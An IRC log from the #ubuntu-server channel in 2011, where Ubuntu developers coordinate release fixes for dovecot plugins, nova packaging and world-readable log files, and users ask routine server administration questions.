<Daviey> jamespage: hmm, wouldn't it make sense to use the same complicated test framework for *world?
<jamespage> I think there is merit in validating simple installs first
<jamespage> Base Install (ISO + Preseed) -> Simple Install (Netinstall + Preseed) -> Complex Install (Juju)
<jamespage> we might want to drop things like orchestra and cobbler into the simple install testing
<jamespage> unlikely we will deploy using juju
<jamespage> for example
<ikonia> Daviey: ping
<Daviey> ikonia: hey
<ikonia> Daviey: advice time I'm afraid
<ikonia> think I've tracked this down to an incompatability with the dovecot version 11.10 is using against how the software maintainer has prepped his code
<ikonia> Daviey: I think (here is where your advice is needed) this may need to go back upstream to the maintainer
<ikonia> or we'll need to write a header from scratch
<ikonia> there is a version check against dovecot to match to a header to include
<ikonia> there is no dovecot 2.0 header, he stops at 1.2
<ikonia> suggestions/opinions advice
<Daviey> gah
 * Daviey sniffs
<ikonia> ?
 * Daviey has a look.
<uvirtbot> New bug: #861582 in nova "Failed snapshots are not cleaned up" [Undecided,New] https://launchpad.net/bugs/861582
<ikonia> Daviey: missing file is antispam-storage-2.0.c
<ikonia> which looking at his webpage, sort of suggests he's inline only for the 1.X tree
<Daviey> yep
<Daviey> upstream doesn't have the fix yet either
<Daviey> :/
<Daviey> http://johannes.sipsolutions.net/Projects/dovecot-antispam
<ikonia> I started playing around with hacking at the 1.2 to try to make soemthing 2.0 that will at least build for a test
<Daviey> ah!
<Daviey> http://wiki2.dovecot.org/Plugins/Antispam
<Daviey> ikonia: yeah, i just did the same
<ikonia> ahhh
<ikonia> let me look at this,
<ikonia> good find.
<Daviey> http://dovecot.org/pipermail/dovecot/2011-September/061134.html
<Daviey> gah, it's a total different codebase
<ikonia> how should this be delt with work with maintainer ? make own missing header ? look at using fork that is 2.0 compatible ?
<ikonia> ha, yes, totally different
<ikonia> based on how this sort of thing is usually handled
<Daviey> If it was a fork, we could have cherrypicked as a patch.
<ikonia> I'll update the bug report in a minute, but thought I'd get some input on the direction you'd like me to take
<ikonia> well, bad wording
<ikonia> "alternative vesion"
<Daviey> Yeah, it's very late in the cycle to consider switching.. I have NFI if they are drop in compatiable.
<ikonia> I can try to work with the maintainer or sort the missing file out myself
<Daviey> Someone concerned it clealry known upstream, and not handled.
<Daviey> It might be more complex than we hoped
<ikonia> I have no doubt
<ikonia> looking at the 1.2 file
<ikonia> I can see at 3 issues straight away
<ikonia> I don't think it's realistic for it to make 11.10 unless the maintainer is holding something back
<ikonia> that said I can start to progress it for inclusion on date $X
<Daviey> The fact it fails to build, is only part of the concern now.. It seems that it will not work with dovecot full stop?
<ikonia> that's not how I was reading that mailing thread
<Daviey> "Yes, the HG code works fine with Dovecot 2, am using it. The Berg site is for Dovecot 1. Dovecot 1 is in use in many distributions like Centos 5, etc. So, it still needs updates."
<Daviey> It sounds to be that the code we have is suitable only for Dovecot 1.X series, and won't be updated
<Daviey> Maintained, but not extended.
<ikonia> I see where you are going
<ikonia> would you like me to start looking at swapping it out to the alterantive version for release $X
 * jamespage adds dovecot-antispam to the list of things for testing automation next cycle
<Daviey> http://bugs.debian.org/631143
<Daviey> debian bug 631143
<uvirtbot> Debian bug 631143 in dovecot-antispam "[dovecot-antispam] Module is for different version 1.2.15" [Grave,Open] http://bugs.debian.org/631143
<ikonia> I'll link our bug into that one for reference
<ikonia> no I won't
<ikonia> that's  1.2 bug
<ikonia> so he does plan to move to dovcecot 2
<Daviey> it's the same issue, just older
<ikonia> how will ubuntu deal with that, just leave it as a broken package until it's available ?
<Daviey> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=631143#15
<uvirtbot> Debian bug 631143 in dovecot-antispam "[dovecot-antispam] Module is for different version 1.2.15" [Grave,Open]
<Daviey> ikonia: I think that is all we can do really.
<ikonia> understood
<Daviey> potential release note.
<ikonia> Daviey: I'll move onto the next bug then, let me know if I can progress that further in any way
<Daviey> ikonia: thanks!
<ikonia> Daviey: what should I mark that bug to as a status
<ikonia> (won't fix ?)
<Daviey> Just confirmed.
<ikonia> ok
<Daviey> Even or Triaged, i guess
<Daviey> ikonia: ssh ubuntu@91.189.93.84
<ikonia> ahhh
<Daviey> ikonia: got in?
<ikonia> yes
<Daviey> but not seeing my message?
<ikonia> kicked me off
<ikonia> I'm seeing it now
<ikonia> got it
<Daviey> ikonia: so, libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I.. -I -I/src/lib -I/src/lib-mail -I
<Daviey> /src/lib-imap -I/src/lib-storage -I/src/lib-dict -I/src/imap -DPKG_RUNDIR=\"\" -
<Daviey> g -O2 -c metadata-plugin.c  -fPIC -DPIC -o .libs/metadata-plugin.o
<Daviey> the -I's need to be after the -o's :)
<Daviey> Does that make sense?
<ikonia> mostly
<m_3> Daviey: rails update... I've upgraded the dep lib packages to 2.3.14, just having problems building one of them
<m_3> some patches reverting previous patches nonsense
<Daviey> m_3: eeeek
<m_3> working through that now
<Daviey> m_3: Does it touch non-rails packages?
<m_3> nope
<Daviey> Oh good.. i was worried we'd be touching ruby itself..
<Daviey> From a release aspect, i think we can touch rails in any way suitable to get it working.
<Daviey> but ruby requires more consideration.
<m_3> nope, really not that complicated of an upgrade, just some dh stuff getting in my way
<m_3> shall I submit merge requests when it's working?
<m_3> I've got branches, and am test-installing these from a ppa
<Daviey> jamespage: jenkins blueprint, "Update documentation for disabling plugin management through web ui" - still a target for oneiric?
<Daviey> m_3: merge branches would be GREAT
<AnAnt> Hello, what is the recommended Wiki engine available on Ubuntu ?
<Daviey> AnAnt: moin
<AnAnt> Daviey: python-moinmoin ?
<Daviey> !moin
<AnAnt> !moin
<Daviey> https://help.ubuntu.com/10.04/serverguide/C/moinmoin.html
<AnAnt> Daviey: thanks
<hallyn> ivoks: exactly, 'easy workaround' was what I went on :)   howdie, btw :)
<hallyn> ivoks: will you be at uds?
<ivoks> hallyn: yes, i got corrected :)
<ivoks> hallyn: and yes, i will be at UDS
<hallyn> cool
<strat-o-caster> I'm getting a bunch of packages "held back" when doing an upgrade.  Is it OK to just install over them?
<pmatulis> strat-o-caster: sounds like you have done some pinning?
<Pici> strat-o-caster: Are you using apt-get upgrade or dist-upgrade?
<strat-o-caster> In particular ssl-cert is asking me if it is OK to replace a cert that was created automatically and is now flawed...
<strat-o-caster> not yet
<strat-o-caster> just apt-get install ssl-cert
<zul> morning
<strat-o-caster> I'm still running an old 8.04 LTS
<strat-o-caster> it was just apt-get upgrade when I got the warning...
<jamespage> Daviey: that can be postponed - reviewing blueprints now
<Daviey> jamespage: i just did a hack and slash on them all, i think they should be pretty reflective now; but please change any that are wrong.
<jamespage> Daviey: lgtm
<Daviey> cool
<hallyn> smb: i understand we probably can't do anything, but just wanted to point out bug 862136 as ipv6 is sort of important to us...
<uvirtbot> Launchpad bug 862136 in linux "Can't define network with IPv6 address in libvirt - fails to define address" [Medium,Triaged] https://launchpad.net/bugs/862136
<strat-o-caster> I think it's OK to plow over my certs.  I backed up /etc/ssl and all my ssl certificates.  I use authorized-keys to let certain people in...
<smb> hallyn, Hm, first I hear of that bug... Will look at it
<PleXs> anyone known if it is possible to reassign a device name to specific hdd ? now the disc is hdb but it should be hdc .. is there a way to do that? :)
<patdk-wk> plexs, not easily
<patdk-wk> this is why you want to use uuid's, and not device names
<patdk-wk> if you really want consistant device names, use /dev/disk/by-path/.... instead
<PleXs> patdk-lap, yeah I use uuid but this is for something special :) a program checks on partition hdc
<PleXs> patdk-wk, I'm using it on virtual machine :)
<patdk-wk> heh?
<PleXs> I could create a dummy virtual disk also.. but if I could adjust it in linux it's more easy
<PleXs> patdk-wk, its a hardware device I'm converting to Vmware machine
<PleXs> its running on linux and I'm using ubuntu 32bit basic as default
<PleXs> patdk-wk, the program that is running on that machine checks for a device hdc if it exists else it fails to start :)
<lynxman> morning everyone o/
<Daviey> m_3: Are you following the dicussion in -release?
<TheEvilPhoenix> Daviey:  there's a release channel?
<TheEvilPhoenix> o.O
<TheEvilPhoenix> (yes, i'm emerging from lurk mode :P)
<Daviey> heh
<TheEvilPhoenix> Daviey:  yes, i'm one of those people who emerges from lurk mode only when something interesting is said or happens :P
<TheEvilPhoenix> such as massive net splits or similar
<TheEvilPhoenix> hey Daviey perhaps you can answer this...
<TheEvilPhoenix> i've got an ubuntu-server of which i installed a GUI onto... and i'm still using aptitude update and what not
<TheEvilPhoenix> i see tons of entries for Translations-<langcode> in the apt update list.  is there a way to neutralize those entries
<TheEvilPhoenix> but keep the primary updates?
<TheEvilPhoenix> s/updates/repos/
<TheEvilPhoenix> such as main, universe, multiverse
<ersi> just remove the translation entries >_>
<ersi> Edit /etc/apt/sources.list
<elb0w`> I changed my interface file from dhcp to static and provided the required criteria
<elb0w`> however it since has rebooted and come back with a dhcp adress
<elb0w`> but I can see it still static in the interface file
<elb0w`> im confused
<TheEvilPhoenix> ersi:  um... which line would i be looking for?
<TheEvilPhoenix> its not in /etc/apt/sources.list
<TheEvilPhoenix> is there any other apt list that it pulls in?
<strat-o-caster> After upgrading ssl-certs.  It seems there are hardly any changes at all in /etc/ssl/certs  Many go back to 2008.  Does this sound right?  I am using 8.04LTS
<elb0w`> nvm
<RoAkSoAx> Daviey: ping
<Linuturk> I've got postfix setup to relay mail through a gmail account. I told postfix to forward all mail meant for postmaster and root to a specific user account. I then told /etc/aliases to forward that specific user account to my gmail account. I can mail from the command line to my gmail account, but if I mail directly to root from the command line, it forwards the message to root@FQDN instead of the address in /etc/aliases. I have run newaliase
<uvirtbot> New bug: #862416 in amavisd-new (main) "logcheck ignore and violation rules are not matching on alternate policy banks" [Undecided,New] https://launchpad.net/bugs/862416
<strat-o-caster> I just ran "update-ca-certificates" but it looks like my certificates (i.e. GeoTrust_Global_CA.crt) is still dated 4/15/2008!  Is this right? How can I update all my certs?  I'm using 8.04 LTS. Thanks!
<_ruben> CA's tend to have fairly long lifetimes, so 3 years aint that old for a CA really
<strat-o-caster> OK, I'm basically getting a Client-SSL-Warning in some perl code that says Peer certificate not verified... Maybe I'm going down the wrong path?
<Daviey> RoAkSoAx: hola
<dkn> why would a raid array created with mdadm on the command line not show up in the GUI disk utility?
<ikonia> because the gui looks for /dev/sd ?
<ikonia> rather than /dev/md
<ikonia> ?
<ikonia> or the meta device isn't actually running/started at this moment in time
<genii-around> dkn: You may need to add the raid module names to /etc/initramfs-tools/modules and sudo update-initramfs -u   for it to be activated during boot time
<_ruben> strat-o-caster: did you verify the peer's certificate using a browser or smth similar?
<Daviey> zul: Are you proposing your nova lxc console bug fix to trunk?
<strat-o-caster> It was in some perl code with HTTP::Request
<dkn> hmmmm well the md shows up in the multi disk devices list, but it's showing it as not started when it is
<dkn> i am getting an error with the metadata version 0.90.0
<ikonia> dkn: if it's showing as not started...it's not started
<zul> Daviey: yep
<zul> Daviey: i should be backporting it today
<Daviey> RoAkSoAx: did you see the comment on bug 827496 ?
<dkn> but that's the thing, if i do cat /proc/mdstat it shows as active, and you can get into all the folders it's mounted at
<uvirtbot> Launchpad bug 827496 in cobbler "cobbler kickstart metadata dont affect ubuntu preseed " [High,Invalid] https://launchpad.net/bugs/827496
<Daviey> zul: rocking
<RoAkSoAx> Daviey: yes, just replied
<RoAkSoAx> :P
<dkn> here's a shot of the disk utility, and the command line output from cat /proc/mdstat http://i55.tinypic.com/dwxnap.png
<fixxxermet> Anyone around that could help me with my preseed script?  Specifically, the partman part.  Trying to create a bunch of mount points but am ending up with only one / partition
<Daviey> RoAkSoAx: awesome.
<_ruben> fixxxermet: might wanna check in #ubuntu-installer .. tho i gave up on preseeding disklayouts fairly quickly .. wasn't worth the effort to me, nor was it flexible enough (or perhaps too flexible, depending on your pov)
<fixxxermet> _ruben: It seems to be plenty flexible - just difficutl!
<koolhead17> fixxxermet: i have it in my todo as well, been over few weeks :)
<dkn> @ikonia make sense?
<fixxxermet>  488  364 S    0  0.0   0:00.16 ntpd 1059 root      20   0 11284
<fixxxermet> oops
<dkn> @genii-around, i loaded the array into /etc/mdadm/mdadm.conf , i thought that's the only place it had to be?
<genii-around> dkn: The default initial ramdisk will not be able to see it unless you rebuild it with the driver it requires. The array will get assembled later on in the boot
<skrite> hey all, i have a pretty much stock install of dovecot and postfix. nice to get email, but how do i configure it to be able to send mail from a client like thunderbird on another computer?
<skrite> only one user will have to do this, and the user is a cron script.
<zul> Daviey/smoser: these are the ones im considering to pull down for Friday http://pastebin.ubuntu.com/699167/
<smoser> zul, we also need to get jamespage's fix in for the chonw -R
<Daviey> zul: looks good, I added a ubuntu task for #3 - that will need closig in the upload
<smoser> and i believe adam_g also had a packaging fix.
<zul> smoser: yeah is the branch kosher now
<Daviey> infact, if all the patches have ubuntu tasks - it makes it easier to review.
<smoser> tasks == bugs ?
<smoser> oh... tasks. never mind. targetted to release.
<smoser> yeah, i agree.
<Daviey> Well they already have bugs for nova?
<zul> there is sudoers fix i want to put in as well
<Daviey> zul: ante's?
<zul> yep
<Daviey> cool
<zul> Daviey: adam_g also had a request for swift but i forget what it is now
<slakcphil> ok got a cron question... would this run every night at midnight mon - fri? thanks http://www.fpaste.org/L7OA/
<slakcphil> if I put it in /etc/crontab
<slakcphil> or is there a one-liner solution for mon-fri
<shauno> slakcphil: that'll work, but 0 0 * * 1-5 /path/to/file  would be tidier
<shauno> (imho, atleast; yours would be more readable, and they'll both do the same thing)
<Daviey> zul: do you have bug numbers for those 4?
<Error404NotFound> How can i print packets in a readable format to and from a certain port? tried tcpdump  -i eth0 -nnXSs 0 'port 9090' but the results aren't that readable.
<Daviey> zul: I need to keep the list current.
<Daviey> hallyn: I'm following the libvirt thread, how is it looking?
<uvirtbot> New bug: #862340 in bacula (main) "package bacula-director-mysql 5.0.1-1ubuntu1 failed to install/upgrade: el subproceso instalado el script post-installation devolviÃ³ el cÃ³digo de salida de error 1" [Undecided,New] https://launchpad.net/bugs/862340
<zul> Daviey: no but i can get one
<Daviey> zul: awesome
<slakcphil> thanks, shauno :)
<adam_g> zul: https://bugs.launchpad.net/swift/+bug/836922
<uvirtbot> Launchpad bug 836922 in swift "swift-ring-builder exit status confusing" [Undecided,Fix committed]
<adam_g> Daviey: ^
<zul> adam_g: cool thanks
<adam_g> i think if we can standardize those now, itd be a good idea. especially for the sake of the juju charm
<uvirtbot> New bug: #862520 in openldap (main) "package slapd 2.4.23-6ubuntu6 failed to install/upgrade: ErrorMessage: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/862520
<Daviey> adam_g: thanks
<uvirtbot> New bug: #862558 in cobbler-enlist (universe) "cobbler-enlist is not checking for return codes enough" [High,Triaged] https://launchpad.net/bugs/862558
<zul> Daviey: http://pastebin.ubuntu.com/699210/
<Daviey> zul: I4014bf64 - check if host list is empty before tyring to weigh hosts (bugfix) ?
<zul> im still on the fence of that one
<uvirtbot> New bug: #862567 in cobbler-enlist (universe) "debconf and documentation should mention lack of SSL" [High,Triaged] https://launchpad.net/bugs/862567
<uvirtbot> New bug: #860492 in cobbler-enlist (universe) "[MIR] cobbler-enlist src, cobbler-enlist-udeb bin" [High,In progress] https://launchpad.net/bugs/860492
<koolhead17> robbiew: hello
<nocturnal> I never used ubuntu server before and I just logged onto one and it says System restart required in the motd. does ubuntu do updates automatically or is that something some admin added?
<el_seano> nocturnal: usually it means updates were acquired and you have a new kernel update that needs to be applied
<nocturnal> el_seano: wow sweet
<ersi> nocturnal: but you're not forced to reboot and will not prompt you every five minutes like other operating systems
<ersi> nocturnal: reboot whenever you have the chance/feel like it/aren't using the system :)
<nocturnal> yeah, thanks
<hallyn> Daviey: i'm back to not knowing why what is happening is happening - nothing new in that thread as of a few hours ago
<Daviey> hallyn: ok, thanks
<zastaph> can't you use the features of Ubuntu-one, but on your own server? so like a private cloud dropbox
<ersi> zastaph: unfortunally not with ubuntu-one AFAIK
<zastaph> been looking for a dropbox alternative that you could host yourself
<ersi> zastaph: But there's a lot of other solutions that are similar (don't have any to recommend to you though :/ I havn't really looked into them)
<ersi> there's sparkleshare, but I dunno - doesn't seem that nice
<zastaph> agree
<zastaph> i like www.sharedesk.at but it's too simple
<zastaph> but can host it yourself
<zastaph> another requirement is that its cross platform, and so far I know of only dropbox and ubuntu one with its windows release
<zastaph> http://en.wikipedia.org/wiki/Ubuntu_One says that Ubuntu one can sync evolution contacts and tomboy notes
<zastaph> its starting to look like an exchange solution
<thefinn93> would this be the appropriate place to ask about some apache related permissions issues that have been stumping me all morning
<ersi> zastaph: Not really..
<ersi> zastaph: It looks like a sync service
<thefinn93> (and by all morning i mean since i got up 20 minutes ago)
<zastaph> im looking for an exchange solution for ubuntu server also
<zastaph> tried zimbra, but I lack knowledge of DNS and https://help.ubuntu.com/community/BIND9ServerHowto is complicated
<uvirtbot> New bug: #862651 in mysql-5.1 (main) "package mysql-server-5.1 (not installed) failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/862651
<RoyK> zastaph: use a dns solution from you provider - most have web-based dns things
<RoyK> which are simple and easy to understand
<zastaph> in my router?
<RoyK> all you need is a an A record for the host and an MX record to point to that mail server
<RoyK> no, for the domain to which you're planning to serve mail
<zastaph> ohh.. but for now im just playing with dyndns and testing
<zastaph> so i presume I need bind on my ubuntu-server
<RoyK> not really
<RoyK> you need a dns server somewhere out there to point to your MX, being the machine that should receive mail
<RoyK> I guess dyndns can do that for you just fine
<RoyK> no need for a local Bind server
<zastaph> dyndns.com free allows you to input an MX Hostname, but I have no clue what to input
<zastaph> if I register foo.dyndns.org what do I put in MX Hostname ?
<smoser> zul, i suppose you're toing to upload nova soon ?
<RoyK> if your machine is called foo, and listens to SMTP, that's your MX
<RoyK> typically, the zimbra server will be your M
<zul> smoser: yeah the only thing blocking me is the chown stuff
<RoyK> X
<zul> smoser: and testing as well
<zastaph> RoyK, if I type foo in MX Hostname I get Please enter a valid hostname for email delivery, if I type mail.foo.dyndns.org I get MX should resolve to A or AAAA record
<zul> Daviey: ping with the console.ring stuff do we have to change the default nova.conf?
<RoyK> zastaph: create record an A or AAAA record for your (zimbra?) host and use that record as MX
<zastaph> only question is how :) im not good with DNS
<RoyK> use dyndns
<RoyK> zastaph: typically, you have one or two MX records for a domain
<RoyK> try dig mx karlsbakk.net
<RoyK> it'll show you which machines services email to my domain
<RoyK> MX == mail exchange
<zastaph> I am using dyndns, i am in the process of creating a name .. but the MX hostname is in the same form
<RoyK> do you have a domain registered?
<zastaph> no, thats what im trying to do
<RoyK> if so, that's registered at some dns server
<RoyK> zastaph: have you registered something.com?
<zastaph> nop
<zastaph> which is why I need to use dyndns for now
<RoyK> well, begin with that
<zul> jamespage: can you update your chown branch please
<zastaph> now that requires payment and thought process :)
<zastaph> would it help if I register foo.dyndns.org first and afterwards edit the MX Hostname?
<RoyK> zastaph: yeah, from joker.com, it costs some $7.20 for .com
<RoyK> quite a lot of money.......
<zastaph> ah it says in form "I have mail server with another name..."
<jamespage> zul: just reminding myself of what needs to be done to it
<zastaph> thought it was for the domain i was just making
<smoser> jamespage, zul
<smoser> i talked to soren yesterday.
<smoser> he was not expecting that to on upgrade.
<RoyK> zastaph: standard procedure is, when sending email, is "do an mx record for something.tld, contact the highest priority MX (lowest number), send
<smoser> the difficulty with this, is if we make it only run on upgrade, then we have to selectively fix the things that would be broken (nogroup or root ownership)
<zastaph> RoyK, I actually just want to test Zimbra on ubuntu-server, and Zimbra complains during installation that I have no MX record or something.. but if I could test it only on LAN i would be ok
<smoser> at this point i think its probably just best to take jamespage's branch as it is right now.
<zul> smoser: okies will do
<zul> im getting patch conflicts with my patch and robie's patch right now though
<smoser> ah. ok.
<zul> will let you know
<jamespage> smoser: so do I need to update to only change files with group ownership of root or nogroup?
<smoser> i think the right fix is to do nothing on upgrade
<smoser> except when we're coming from a broken version
<smoser> so maybe if version < current-right-now-archive-version:
<jamespage> Daviey: branch proposed for dovecot-metadata-plugin - builds OK and looks similar to that already in the archive
<smoser>  find -group nogroup || -group root && chown
<smoser>  of course avoiding lxc mounts
<smoser> but doing that scares me because we've always done this before.
<RoyK> zastaph: just remember that zimbra should be installed on a dedicated computer. it uses a full set of preconfigured packages, and can't be easily installed to use standard mysql/postfix/etc
<RoyK> zastaph: so you'd probably be better off with a VM
<RoyK> that's what I use
<zastaph> yes thats the plan
<zastaph> do you use zimbra too?
<RoyK> yeah
<zastaph> i was able to create an MX hostname on the second dyndns i created (to the first)
<RoyK> zastaph: try to read up about how dns works
<RoyK> it's not that hard
<zastaph> yeah i know the basics, but getting it set up in ubuntu so that zimbra understands it is not that easy, and is hard to find a recent step by step guide
<RoyK> zimbra doesn't need to understand dns
<RoyK> the Net needs to know where to send email so that it reaches your zimbra server
<RoyK> that's what DNS is about
<zastaph> ok but it complains during ./install.sh because something was not setup right, and I dont know where
<RoyK> zimbra doesn't give a shit
<RoyK> never mind that
<RoyK> that installation is a bit paranoid
<RoyK> the only important parts are 1: your server must be open to receive SMTP and 2: there must be an MX pointing to that address
<zastaph> oh it says i need to login as root when running install i didnt do that last time
<RoyK> just sudo ./install
<RoyK> bbiab
<axisys> do I need oracle support to install/use http://packages.ubuntu.com/lucid/ksplice ?
<RoyK> axisys: why would you?
<axisys> RoyK: aparently I do for the key.. I had a long talk with jesstess on #ksplice
<axisys> anyone who were using ksplice before oracle bought them are safe
<RoyK> there'll be a fork soon, or so we all hope
<RoyK> it's GPL after all
<axisys> https://github.com/CentOS/ksplice <--
<axisys> may be one for ubuntu
<RoyK> afaics ksplice is in ubuntu 11.04
<RoyK> prolly not in 10.04 though
<RoyK> well, it's in 10.04 as well
<RoyK> apt-get install .....
<uvirtbot> New bug: #862728 in etckeeper (main) "Please stop defaulting to VCS="bzr"" [Undecided,New] https://launchpad.net/bugs/862728
<zul> smoser: so you are ok with this? https://code.launchpad.net/~james-page/nova/fix-lxc-and-primary-group/+merge/77308
<smoser> what is $ on fresh install ?
<smoser> $2
<soren> ""
<soren> Or unset, rather.
<axisys> RoyK: but you will need a key, no ?
<smoser> so then we at least have to quote that $2
<axisys> RoyK: i will try on a VM
<smoser> as it is right now, it wont run on first install, right?
<smoser> - if dpkg --compare-versions $2 lt "2011.3-0ubuntu4"; then
<smoser> + if [ -z "$2" ] || dpkg --compare-versions "$2" lt "2011.3-0ubuntu4"; then
<smoser> or maybe
<smoser> + if [ -z "$2" ]; then
<soren> lt treats an empty version as earlier than any version.
<smoser> yes, but its not quoted
<smoser> so it will just end in dpkg error
<smoser> which is false, and wont do it
<soren> Sorry, $2 is "".
<jamespage> so how about I quote it then
<soren> But I'd quote it anyways.
<soren> Just to be sure.
<uvirtbot> New bug: #862757 in munin (main) "the munin plugin sensors_ does not recognize the values of volt and fan from lm-sensors" [Undecided,New] https://launchpad.net/bugs/862757
<soren> Debian Policy isn't completely unambiguous on the subject.
<smoser> soren, what do you mean it is ""
<soren> smoser: And empty string.
<smoser> right.
<smoser> so it has to be quoted
<soren> s/and/an/, obviously.
<soren> No.
<smoser> yes
<soren> Er.r.
<smoser> or shell passes nothing there.
<soren> Yes.
<soren> Right.
<smoser>  dpkg --compare-versions lt "2011.3-0ubuntu4"
<smoser> !=
<soren> Right.
<smoser>  dpkg --compare-versions "" lt "2011.3-0ubuntu4"
<smoser> the first is bad input to dpkg
<soren> Yeah.
<smoser> so that would be false, so it doesn't take that 'if' code, and odes nothing on first install.
<smoser> which is not what we wnat. on first install, you *were* doing a chown. so we should continue to do that i think.
<jamespage> smoser: it will run on first install
<smoser> damn you!
<smoser> you can't add quotes in the middle
<smoser> :)
<smoser> my loaded page did not have the ""
<smoser> so yes, that will run on first install.
<smoser> so yes, assuming the find syntax is good, i approve of that.
<smoser> but i admit to messing up find syntax more than once in my life
<jamespage> I did a quick test  - looked OK to me
<jamespage> ignores anything that is not nova:root or nova:nogroup
<zul> jamespage: so if i merge the branch it should be kosher right?
<jamespage> zul: I reckon so
<zul> jamespage: ok ill pull it later tonight
<jamespage> gre8t
<Daviey> it's all going to go wrong, you'll see.
<jamespage> always appreciate review of find syntax - as smoser says easy to get wrong
<Daviey> find has so many different options.
<jamespage> Daviey: did you see my ping re dovecot-metadata-plugin
<Daviey> jamespage: no
<Daviey> got it
<jamespage> Daviey: ah - new upstream release prepared - I have no idea how to test
<jamespage> and can't upload
<jamespage> ah - doko has already had a look
<Daviey> jamespage: how much confidence do you have with it?
<jamespage> it builds, it produces pretty much the same .so's as the previous version of the package
<jamespage> it appears to be actively maintained and formally released alongside dovecot
<jamespage> Daviey, more confident it will work that whats currently in the archive
<Daviey> jamespage: I really do wish launchpad had a 'sponsor into archive' button
<jamespage> Daviey: that would be a nice feature
<Ursinha> Daviey, https://launchpad.net/launchpad/+filebug
<Ursinha> :)
<Daviey> Ursinha: I can't be bothered to build a package, do you think i can be so to raise a bug?
<jamespage> Daviey: http://www.dovecot.org/list/dovecot/2011-June/059630.html
<jamespage> think we can probably put some faith in it
<Ursinha> Daviey, there's no need to be rude, man, I'm just giving you a hint that filing a bug is what you need to do to have new features in Launchpad :)
<Daviey> Ursinha: Oh sorry, i didn't mean to come across like that.
<Daviey> I should have thrown on a smiley
<jamespage> what happened to build from branch anyways?
<Daviey> Still on the roadmap aiui
<adam_g> hmm. when the hell did /var/log/nova/* become world readable?
<Daviey> adam_g: I *think* it always has been
<jamespage> ditto what Daviey said
<adam_g> really? ive always been in the habbit of sudo'ing to read them i guess
<Daviey> It's not the only log file which is like that, mail.log is another
<Daviey> syslog
<adam_g> http://paste.ubuntu.com/699337/
<Daviey> *awesome*
<Daviey> adam_g: You suck at picking passwords btw.
<adam_g> Daviey: i was just confirming the issue :)
<adam_g> FWIW, that stuff is only logged with '--verbose' set in nova.conf.. which is enabled by default
<Daviey> adam_g: I know, i know.. I saw the password you picked for mysql.. :)
<uvirtbot> New bug: #862816 in nova (main) "/var/log/nova/* is world-readable" [Undecided,New] https://launchpad.net/bugs/862816
<Daviey> RoAkSoAx: Are you going to have time to look at a cobbler enablement of cobbler-enlist whilst sprinting?
<Daviey> RoAkSoAx: If you are, aadding "anna/choose_modules=cobbler-enlist-udeb" to the kernel APPEND line should be enough to invoke it
<Daviey> kirkland: I don't suppose you have had a chance to smoke the openstack dashboard?
<kirkland> Daviey: smoke test it?
<Daviey> (If so, django-mailer is a missing dep - which has been baking in the source NEW queue.)
<kirkland> Daviey: sadly, we haven't gotten to it
<kirkland> Daviey: i'll take a look, though at the queue if you like
<Daviey> kirkland: err, yeah - smoke test.. certainly not smoke crack.
<kirkland> Daviey: i know from experience now that keystone is non-functional :-(
<Daviey> cool
<Daviey> kirkland: A total brick?
<kirkland> Daviey: completely non-functional
<RoAkSoAx> Daviey: I hope so tomorrow
<adam_g> Daviey: from what ive read, keystone is now a requirement of dashboard
<Daviey> kirkland: I imagine just trying to work out how the hell it fits together is less than fun, last i looked the docs were weak
<Daviey> adam_g: yah
<adam_g> tho im not sure the package we have in the archive was snapshotted before or after that requirement was introduced
<Daviey> RoAkSoAx: awesome
<Daviey> adam_g: I'm pretty sure it's after
<zul> adam_g: ill merge your swift branch tonight
<zul> Daviey/adam_g: so for the logfile thing there is gflag a called logfile_mode but its not set anywhere by default and its only used in nova/log.py for:
<zul>                 st = os.stat(self.logpath)
<zul>                 if st.st_mode != (stat.S_IFREG | FLAGS.logfile_mode):
<zul>                     os.chmod(self.logpath, FLAGS.logfile_mode)
<adam_g> zul: ill look into that. what about just 'chmod 700 /var/log/nova' in postinst?
<adam_g> same problem in glance btw (also with glance config files)
<zul> adam_g: yeah as a work around  wouldnt 600 be better though? i still think the nova is doing it wrong though, im worried about it changing after you restart nova-compute or something
<adam_g> zul: ill see if logfile_mode works. if so, we should just add that to nova.conf by default.
<zul> adam_g: agreed
<Daviey> adam_g: when the log files are rotate, what will happen if it's just chmodded?
<Daviey> adam_g: if you are investigating those, can you assign yourself please?
<adam_g> Daviey: yeah, gonna take a look at it in a bit
<Daviey> adam_g: awesome
<zul> Daviey: ill try to get a fix upstream as well
<Daviey> zul: rocking
<Daviey> it's all starting to come together
<Daviey> which is handy, now we are in Final Freeze
<rmk> Hi.  Is multicast blocked by default on 11.04?
<rmk> One of you 300 people has to know?
<qman__> rmk, nothing is blocked by default
<rmk> ok thanks
<qman__> the firewall is an accept all policy with no rules
<qman__> there may be a kernel setting preventing something you're doing from working, though
<qman__> review them in /etc/default/sysctl IIRC
<soren> Those are only the overrides. The kernel has its own defaults.
#ubuntu-server 2011-09-30
<uvirtbot> New bug: #862915 in postfix (main) "package postfix 2.8.2-1ubuntu2.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 75" [Undecided,New] https://launchpad.net/bugs/862915
<hydrogen18> would anyone care to me help with a lvm problem?
<twb> !anyone
<ubottu> A high percentage of the first questions asked in this channel start with "Does anyone/anybody..." Why not ask your next question (the real one) and find out? See also !details, !gq, and !poll.
<hydrogen18>  Hello, I have a problem: I have a logical volume which has "#open" of 1 when I run lvdisplay. But looking in /proc/mount it is not mounted and 'lsof' does not return anything having it open. 'fuser -ki' does not prompt me to kill any processes when run against the logical volume. I am running ubuntu 10.04 server amd64
<twb> hydrogen18: any processes wedged in D state?
<hydrogen18> twb: how do I check for that
<twb> ps auxf | grep -2 D
<twb> There is a column where most stuff is "S" (idling), a few "R" (running), and occasionally "D" (wedged)
<hydrogen18> it would seem not.
<hydrogen18> there are definitely none in 'D' state
<twb> Then I don't know
<twb> occasionally stuff just gets like that and it's impossible to tell why
<hydrogen18> so im just screwed?
<twb> A reboot will definitely clear it, so that's your worst-case scenario
<twb> I would also try umount -f
<hydrogen18> I guess I'm doing a recovery then.
<hydrogen18> its not mound
<hydrogen18> mounted*
<hydrogen18> i mean I guess im doing a reboot
<twb> Are you sure it's not just that it's active?
<hydrogen18> how do I check to see if it is active?
<twb> lvchange -an /dev/foo/bar
<hydrogen18> " LV dyson/swarm in use: not deactivating" what brought me here
